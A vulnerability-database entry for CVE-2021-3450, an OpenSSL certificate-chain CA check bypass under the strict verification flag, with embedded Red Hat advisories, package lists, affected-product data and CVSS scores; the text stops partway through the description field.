var-202103-1463
Vulnerability from variot
The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a "purpose" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named "purpose" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j). OpenSSL is an open source general encryption library of the Openssl team that can implement the Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLSv1) protocols. The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Important: Red Hat Virtualization security, bug fix, and enhancement update Advisory ID: RHSA-2021:1189-01 Product: Red Hat Virtualization Advisory URL: https://access.redhat.com/errata/RHSA-2021:1189 Issue date: 2021-04-14 CVE Names: CVE-2021-3449 CVE-2021-3450 =====================================================================
- Summary:
An update is now available for Red Hat Virtualization 4 for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
RHEL 8-based RHEV-H for RHEV 4 (build requirements) - noarch, x86_64 Red Hat Virtualization 4 Hypervisor for RHEL 8 - noarch, x86_64
- Description:
The redhat-virtualization-host packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
The ovirt-node-ng packages provide the Red Hat Virtualization Host. These packages include redhat-release-virtualization-host, ovirt-node, and rhev-hypervisor. Red Hat Virtualization Hosts (RHVH) are installed using a special build of Red Hat Enterprise Linux with only the packages required to host virtual machines. RHVH features a Cockpit user interface for monitoring the host's resources and performing administrative tasks.
Changes to the redhat-release-virtualization-host component:
- Previously, the redhat-support-tool was missing from the RHV-H 4.4 package. In this release, the redhat-support-tool has been added. (BZ#1928607)
Security Fix(es):
-
openssl: NULL pointer dereference in signature_algorithms processing (CVE-2021-3449)
-
openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT (CVE-2021-3450)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/2974891
The system must be rebooted for this update to take effect. For the update to take effect, all services linked to the glibc library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1892573 - RHVH 4.4.2 fails to boot from SAN when using UUID for /boot partition 1895832 - RHVH 4.4.3: No response when clicking button "Help" in Anaconda GUI 1907306 - "sysstat" doesn't collect data for upgraded RHVH 1907358 - In FIPS mode, RHVH cannot enter the new layer after upgrade 1907746 - RHVH cannot enter the new layer after upgrade testing with STIG profile selected. 1918207 - RHVH upgrade to 4.4.5-1 will fail due to FileNotFoundError 1927395 - RHVH, protecting key packages from being removed. 1928607 - redhat-support-tool is missing from latest RHV-H 4.4 1940845 - Include updated gluster-ansible-features in RHV-H 4.4.5 1941547 - CVE-2021-3450 openssl: CA certificate check bypass with X509_V_FLAG_X509_STRICT 1941554 - CVE-2021-3449 openssl: NULL pointer dereference in signature_algorithms processing 1942040 - Rebase RHV-H 4.4.5 on RHEL-AV 8.3.1 Async 1942498 - Rebase RHV-H 4.4.5 on RHEL-8.3.1.3
- Package List:
Red Hat Virtualization 4 Hypervisor for RHEL 8:
Source: boost-1.66.0-10.el8.src.rpm dyninst-10.1.0-4.el8.src.rpm gcc-8.3.1-5.1.el8.src.rpm isl-0.16.1-6.el8.src.rpm libmpc-1.0.2-9.el8.src.rpm libxcrypt-4.1.1-4.el8.src.rpm make-4.2.1-10.el8.src.rpm redhat-virtualization-host-4.4.5-20210330.0.el8_3.src.rpm tbb-2018.2-9.el8.src.rpm zip-3.0-23.el8.src.rpm
noarch: redhat-virtualization-host-image-update-4.4.5-20210330.0.el8_3.noarch.rpm vim-filesystem-8.0.1763-15.el8.noarch.rpm
x86_64: boost-atomic-debuginfo-1.66.0-10.el8.x86_64.rpm boost-chrono-debuginfo-1.66.0-10.el8.x86_64.rpm boost-container-debuginfo-1.66.0-10.el8.x86_64.rpm boost-context-debuginfo-1.66.0-10.el8.x86_64.rpm boost-coroutine-debuginfo-1.66.0-10.el8.x86_64.rpm boost-date-time-1.66.0-10.el8.x86_64.rpm boost-date-time-debuginfo-1.66.0-10.el8.x86_64.rpm boost-debuginfo-1.66.0-10.el8.x86_64.rpm boost-debugsource-1.66.0-10.el8.x86_64.rpm boost-doctools-debuginfo-1.66.0-10.el8.x86_64.rpm boost-fiber-debuginfo-1.66.0-10.el8.x86_64.rpm boost-filesystem-debuginfo-1.66.0-10.el8.x86_64.rpm boost-graph-debuginfo-1.66.0-10.el8.x86_64.rpm boost-graph-mpich-debuginfo-1.66.0-10.el8.x86_64.rpm boost-graph-openmpi-debuginfo-1.66.0-10.el8.x86_64.rpm boost-iostreams-debuginfo-1.66.0-10.el8.x86_64.rpm boost-locale-debuginfo-1.66.0-10.el8.x86_64.rpm boost-log-debuginfo-1.66.0-10.el8.x86_64.rpm boost-math-debuginfo-1.66.0-10.el8.x86_64.rpm boost-mpich-debuginfo-1.66.0-10.el8.x86_64.rpm boost-mpich-python3-debuginfo-1.66.0-10.el8.x86_64.rpm boost-numpy3-debuginfo-1.66.0-10.el8.x86_64.rpm boost-openmpi-debuginfo-1.66.0-10.el8.x86_64.rpm boost-openmpi-python3-debuginfo-1.66.0-10.el8.x86_64.rpm boost-program-options-debuginfo-1.66.0-10.el8.x86_64.rpm boost-python3-debuginfo-1.66.0-10.el8.x86_64.rpm boost-random-debuginfo-1.66.0-10.el8.x86_64.rpm boost-regex-debuginfo-1.66.0-10.el8.x86_64.rpm boost-serialization-debuginfo-1.66.0-10.el8.x86_64.rpm boost-signals-debuginfo-1.66.0-10.el8.x86_64.rpm boost-stacktrace-debuginfo-1.66.0-10.el8.x86_64.rpm boost-system-debuginfo-1.66.0-10.el8.x86_64.rpm boost-test-debuginfo-1.66.0-10.el8.x86_64.rpm boost-thread-debuginfo-1.66.0-10.el8.x86_64.rpm boost-timer-debuginfo-1.66.0-10.el8.x86_64.rpm boost-type_erasure-debuginfo-1.66.0-10.el8.x86_64.rpm boost-wave-debuginfo-1.66.0-10.el8.x86_64.rpm bpftool-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm compat-libmpc-debuginfo-1.0.2-9.el8.x86_64.rpm cpp-8.3.1-5.1.el8.x86_64.rpm cpp-debuginfo-8.3.1-5.1.el8.x86_64.rpm dyninst-10.1.0-4.el8.x86_64.rpm dyninst-debuginfo-10.1.0-4.el8.x86_64.rpm dyninst-debugsource-10.1.0-4.el8.x86_64.rpm dyninst-devel-debuginfo-10.1.0-4.el8.x86_64.rpm dyninst-testsuite-debuginfo-10.1.0-4.el8.x86_64.rpm gcc-8.3.1-5.1.el8.x86_64.rpm gcc-c++-debuginfo-8.3.1-5.1.el8.x86_64.rpm gcc-debuginfo-8.3.1-5.1.el8.x86_64.rpm gcc-debugsource-8.3.1-5.1.el8.x86_64.rpm gcc-gdb-plugin-debuginfo-8.3.1-5.1.el8.x86_64.rpm gcc-gfortran-debuginfo-8.3.1-5.1.el8.x86_64.rpm gcc-offload-nvptx-debuginfo-8.3.1-5.1.el8.x86_64.rpm gcc-plugin-devel-debuginfo-8.3.1-5.1.el8.x86_64.rpm glibc-debuginfo-2.28-127.el8_3.2.x86_64.rpm glibc-debuginfo-common-2.28-127.el8_3.2.x86_64.rpm glibc-devel-2.28-127.el8_3.2.x86_64.rpm glibc-headers-2.28-127.el8_3.2.x86_64.rpm isl-0.16.1-6.el8.x86_64.rpm isl-debugsource-0.16.1-6.el8.x86_64.rpm kernel-debug-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm kernel-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm kernel-debuginfo-common-x86_64-4.18.0-240.22.1.el8_3.x86_64.rpm kernel-devel-4.18.0-240.22.1.el8_3.x86_64.rpm kernel-headers-4.18.0-240.22.1.el8_3.x86_64.rpm kernel-tools-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm libasan-debuginfo-8.3.1-5.1.el8.x86_64.rpm libatomic-debuginfo-8.3.1-5.1.el8.x86_64.rpm libgcc-8.3.1-5.1.el8.x86_64.rpm libgcc-debuginfo-8.3.1-5.1.el8.x86_64.rpm libgfortran-debuginfo-8.3.1-5.1.el8.x86_64.rpm libgomp-8.3.1-5.1.el8.x86_64.rpm libgomp-debuginfo-8.3.1-5.1.el8.x86_64.rpm libgomp-offload-nvptx-debuginfo-8.3.1-5.1.el8.x86_64.rpm libitm-debuginfo-8.3.1-5.1.el8.x86_64.rpm liblsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm libmpc-1.0.2-9.el8.x86_64.rpm libmpc-debuginfo-1.0.2-9.el8.x86_64.rpm libmpc-debugsource-1.0.2-9.el8.x86_64.rpm libquadmath-debuginfo-8.3.1-5.1.el8.x86_64.rpm libstdc++-debuginfo-8.3.1-5.1.el8.x86_64.rpm libtsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm libubsan-debuginfo-8.3.1-5.1.el8.x86_64.rpm libxcrypt-debugsource-4.1.1-4.el8.x86_64.rpm libxcrypt-devel-4.1.1-4.el8.x86_64.rpm make-4.2.1-10.el8.x86_64.rpm make-debugsource-4.2.1-10.el8.x86_64.rpm perf-4.18.0-240.22.1.el8_3.x86_64.rpm perf-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm python3-perf-debuginfo-4.18.0-240.22.1.el8_3.x86_64.rpm tbb-2018.2-9.el8.x86_64.rpm tbb-debugsource-2018.2-9.el8.x86_64.rpm vim-X11-debuginfo-8.0.1763-15.el8.x86_64.rpm vim-common-8.0.1763-15.el8.x86_64.rpm vim-common-debuginfo-8.0.1763-15.el8.x86_64.rpm vim-debuginfo-8.0.1763-15.el8.x86_64.rpm vim-debugsource-8.0.1763-15.el8.x86_64.rpm vim-enhanced-8.0.1763-15.el8.x86_64.rpm vim-enhanced-debuginfo-8.0.1763-15.el8.x86_64.rpm vim-minimal-debuginfo-8.0.1763-15.el8.x86_64.rpm zip-3.0-23.el8.x86_64.rpm zip-debugsource-3.0-23.el8.x86_64.rpm
RHEL 8-based RHEV-H for RHEV 4 (build requirements):
Source: imgbased-1.2.18-0.1.el8ev.src.rpm redhat-release-virtualization-host-4.4.5-4.el8ev.src.rpm scap-security-guide-0.1.50-1.el8ev.src.rpm
noarch: imgbased-1.2.18-0.1.el8ev.noarch.rpm python3-imgbased-1.2.18-0.1.el8ev.noarch.rpm redhat-virtualization-host-image-update-placeholder-4.4.5-4.el8ev.noarch.rpm scap-security-guide-rhv-0.1.50-1.el8ev.noarch.rpm
x86_64: redhat-release-virtualization-host-4.4.5-4.el8ev.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2021-3449 https://access.redhat.com/security/cve/CVE-2021-3450 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYHbW2dzjgjWX9erEAQhrvQ//VGyhTZ32NVUTnNMVVaHZyN5HL2Gt7CRG sOA8Z7hKGGPq8nHZEeTtk2KBpxaLLzVHxKmILtnsRTlRqq2s4BSgd9j7YhNvTlZe kK6Y3ovcWBKdqqui2ezZz9WFmKbQ5yjJImMo+TfyAS0D1RLwxNyKzDyYDCIZuO03 1AcV0ILWSVpaEKRrjOX6S0VnmMR0hqf4JmgLk8/ePv3wp+vd5voeIymWDPy6KrPW 0WS6NLHHNGucnzKXiRglwLeWKCYdQ+MCewkLKch/4eQPI28+N72dEgI9nhbZMind khmKrnPDt5CIS9aWNmm+B/pWHZB1kEFt6hls/+xn2aXvrHxGgj6aTyl1peMhxYwA bvlQx+p1jOOREgtvnQHwemAVEuZByW4QFWqdZn/BIqbImTjxlawqYRwHjWpOvMfo Z6l7kiG86TsEWj/QJGAoRvwmqer7pWrttVeUivFBNmUhgZ8lEIMT3MkULY8VBJp+ PrwbQwfpMn38PZbnl/DT3A0aSgZ1Q1uQZooW8B6zBKYUdgwTU8impaBaKfyM9QRq hCqHX42S4b/tNZhy64hlfkv24kei4RqgI4sGVeDfSA/tWzdgvBghQ1pOEhlPY4MH jINgKocRD1f08X0meBmqk4IuoZdWkUrGgvprmT81At4ZF3omaQ1amKj1HhXpmJVa da5fQnRzZzc= =xbcY -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . Summary:
Red Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 7 zip release for RHEL 7, RHEL 8 and Microsoft Windows is available. This software, such as Apache HTTP Server, is common to multiple JBoss middleware products, and is packaged under Red Hat JBoss Core Services to allow for faster distribution of updates, and for a more consistent update experience.
This release adds the new Apache HTTP Server 2.4.37 Service Pack 7 packages that are part of the JBoss Core Services offering.
This release serves as a replacement for Red Hat JBoss Core Services Pack Apache Server 2.4.37 Service Pack 6 and includes bug fixes and enhancements. Refer to the Release Notes for information on the most significant bug fixes and enhancements included in this release. Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link for the update. You must be logged in to download the update.
Security Fix(es):
- golang: crypto/tls: certificate of wrong type is causing TLS client to panic (CVE-2021-34558)
- golang: net: lookup functions may return invalid host names (CVE-2021-33195)
- golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty (CVE-2021-33197)
- golang: match/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents (CVE-2021-33198)
- golang: encoding/xml: infinite loop when using xml.NewTokenDecoder with a custom TokenReader (CVE-2021-27918)
- golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header (CVE-2021-31525)
- golang: archive/zip: malformed archive may cause panic or memory exhaustion (CVE-2021-33196)
It was found that the CVE-2021-27918, CVE-2021-31525 and CVE-2021-33196 have been incorrectly mentioned as fixed in RHSA for Serverless client kn 1.16.0. Bugs fixed (https://bugzilla.redhat.com/):
1983596 - CVE-2021-34558 golang: crypto/tls: certificate of wrong type is causing TLS client to panic 1983651 - Release of OpenShift Serverless Serving 1.17.0 1983654 - Release of OpenShift Serverless Eventing 1.17.0 1989564 - CVE-2021-33195 golang: net: lookup functions may return invalid host names 1989570 - CVE-2021-33197 golang: net/http/httputil: ReverseProxy forwards connection headers if first one is empty 1989575 - CVE-2021-33198 golang: math/big.Rat: may cause a panic or an unrecoverable fatal error if passed inputs with very large exponents 1992955 - CVE-2021-3703 serverless: incomplete fix for CVE-2021-27918 / CVE-2021-31525 / CVE-2021-33196
5
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202103-1463",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "storagegrid",
"scope": "eq",
"trust": 2.0,
"vendor": "netapp",
"version": null
},
{
"model": "ontap select deploy administration utility",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "cloud volumes ontap mediator",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "node.js",
"scope": "lt",
"trust": 1.0,
"vendor": "nodejs",
"version": "10.24.1"
},
{
"model": "node.js",
"scope": "lt",
"trust": 1.0,
"vendor": "nodejs",
"version": "15.14.0"
},
{
"model": "nessus agent",
"scope": "gte",
"trust": 1.0,
"vendor": "tenable",
"version": "8.2.1"
},
{
"model": "enterprise manager for storage management",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "13.4.0.0"
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.59"
},
{
"model": "sma100",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "10.2.1.0-17sv"
},
{
"model": "nessus network monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "tenable",
"version": "5.13.0"
},
{
"model": "node.js",
"scope": "lt",
"trust": 1.0,
"vendor": "nodejs",
"version": "12.22.1"
},
{
"model": "nessus network monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "tenable",
"version": "5.12.0"
},
{
"model": "jd edwards enterpriseone tools",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "9.2.6.0"
},
{
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.23"
},
{
"model": "capture client",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "3.6.24"
},
{
"model": "jd edwards world security",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "a9.4"
},
{
"model": "openssl",
"scope": "gte",
"trust": 1.0,
"vendor": "openssl",
"version": "1.1.1h"
},
{
"model": "oncommand workflow automation",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "node.js",
"scope": "gte",
"trust": 1.0,
"vendor": "nodejs",
"version": "10.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "windriver",
"version": null
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "14.1.1.0.0"
},
{
"model": "mysql connectors",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.23"
},
{
"model": "secure global desktop",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "5.6"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "10.1.1"
},
{
"model": "secure backup",
"scope": "lt",
"trust": 1.0,
"vendor": "oracle",
"version": "18.1.0.1.0"
},
{
"model": "santricity smi-s provider",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"model": "peoplesoft enterprise peopletools",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.57"
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "34"
},
{
"model": "mysql server",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "5.7.33"
},
{
"model": "mysql server",
"scope": "gte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.15"
},
{
"model": "node.js",
"scope": "gte",
"trust": 1.0,
"vendor": "nodejs",
"version": "12.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "windriver",
"version": "18.0"
},
{
"model": "commerce guided search",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "11.3.2"
},
{
"model": "mysql enterprise monitor",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.23"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "8.2.19"
},
{
"model": "nessus network monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "tenable",
"version": "5.11.0"
},
{
"model": "mysql workbench",
"scope": "lte",
"trust": 1.0,
"vendor": "oracle",
"version": "8.0.23"
},
{
"model": "web gateway",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "9.2.10"
},
{
"model": "nessus network monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "tenable",
"version": "5.12.1"
},
{
"model": "node.js",
"scope": "gte",
"trust": 1.0,
"vendor": "nodejs",
"version": "14.0.0"
},
{
"model": "node.js",
"scope": "lt",
"trust": 1.0,
"vendor": "nodejs",
"version": "14.16.1"
},
{
"model": "node.js",
"scope": "gte",
"trust": 1.0,
"vendor": "nodejs",
"version": "15.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "windriver",
"version": "19.0"
},
{
"model": "web gateway cloud service",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "8.2.19"
},
{
"model": "web gateway cloud service",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "10.1.1"
},
{
"model": "graalvm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "19.3.5"
},
{
"model": "weblogic server",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "12.2.1.4.0"
},
{
"model": "nessus",
"scope": "lte",
"trust": 1.0,
"vendor": "tenable",
"version": "8.13.1"
},
{
"model": "sonicos",
"scope": "lte",
"trust": 1.0,
"vendor": "sonicwall",
"version": "7.0.1-r1456"
},
{
"model": "nessus network monitor",
"scope": "eq",
"trust": 1.0,
"vendor": "tenable",
"version": "5.11.1"
},
{
"model": "nessus agent",
"scope": "lte",
"trust": 1.0,
"vendor": "tenable",
"version": "8.2.3"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "windriver",
"version": "17.0"
},
{
"model": "graalvm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "20.3.1.2"
},
{
"model": "freebsd",
"scope": "eq",
"trust": 1.0,
"vendor": "freebsd",
"version": "12.2"
},
{
"model": "web gateway cloud service",
"scope": "eq",
"trust": 1.0,
"vendor": "mcafee",
"version": "9.2.10"
},
{
"model": "graalvm",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "21.0.0.2"
},
{
"model": "openssl",
"scope": "lt",
"trust": 1.0,
"vendor": "openssl",
"version": "1.1.1k"
},
{
"model": "email security",
"scope": "lt",
"trust": 1.0,
"vendor": "sonicwall",
"version": "10.0.11"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "162694"
},
{
"db": "PACKETSTORM",
"id": "162172"
},
{
"db": "PACKETSTORM",
"id": "162307"
},
{
"db": "PACKETSTORM",
"id": "162197"
},
{
"db": "PACKETSTORM",
"id": "164192"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
}
],
"trust": 1.1
},
"cve": "CVE-2021-3450",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2021-3450",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.0,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-388430",
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.2,
"id": "CVE-2021-3450",
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-3450",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202103-1456",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-388430",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-388430"
},
{
"db": "CNNVD",
"id": "CNNVD-202103-1456"
},
{
"db": "NVD",
"id": "CVE-2021-3450"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The X509_V_FLAG_X509_STRICT flag enables additional security checks of the certificates present in a certificate chain. It is not set by default. Starting from OpenSSL version 1.1.1h a check to disallow certificates in the chain that have explicitly encoded elliptic curve parameters was added as an additional strict check. An error in the implementation of this check meant that the result of a previous check to confirm that certificates in the chain are valid CA certificates was overwritten. This effectively bypasses the check that non-CA certificates must not be able to issue other certificates. If a \"purpose\" has been configured then there is a subsequent opportunity for checks that the certificate is a valid CA. All of the named \"purpose\" values implemented in libcrypto perform this check. Therefore, where a purpose is set the certificate chain will still be rejected even when the strict flag has been used. A purpose is set by default in libssl client and server certificate verification routines, but it can be overridden or removed by an application. In order to be affected, an application must explicitly set the X509_V_FLAG_X509_STRICT verification flag and either not set a purpose for the certificate verification or, in the case of TLS client or server applications, override the default purpose. OpenSSL versions 1.1.1h and newer are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1h-1.1.1j). OpenSSL is an open source general encryption library of the Openssl team that can implement the Secure Sockets Layer (SSLv2/v3) and Transport Layer Security (TLSv1) protocols. The product supports a variety of encryption algorithms, including symmetric ciphers, hash algorithms, secure hash algorithms, etc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: Red Hat Virtualization security, bug fix, and enhancement update\nAdvisory ID: RHSA-2021:1189-01\nProduct: Red Hat Virtualization\nAdvisory URL: https://access.redhat.com/errata/RHSA-2021:1189\nIssue date: 2021-04-14\nCVE Names: CVE-2021-3449 CVE-2021-3450 \n=====================================================================\n\n1. Summary:\n\nAn update is now available for Red Hat Virtualization 4 for Red Hat\nEnterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRHEL 8-based RHEV-H for 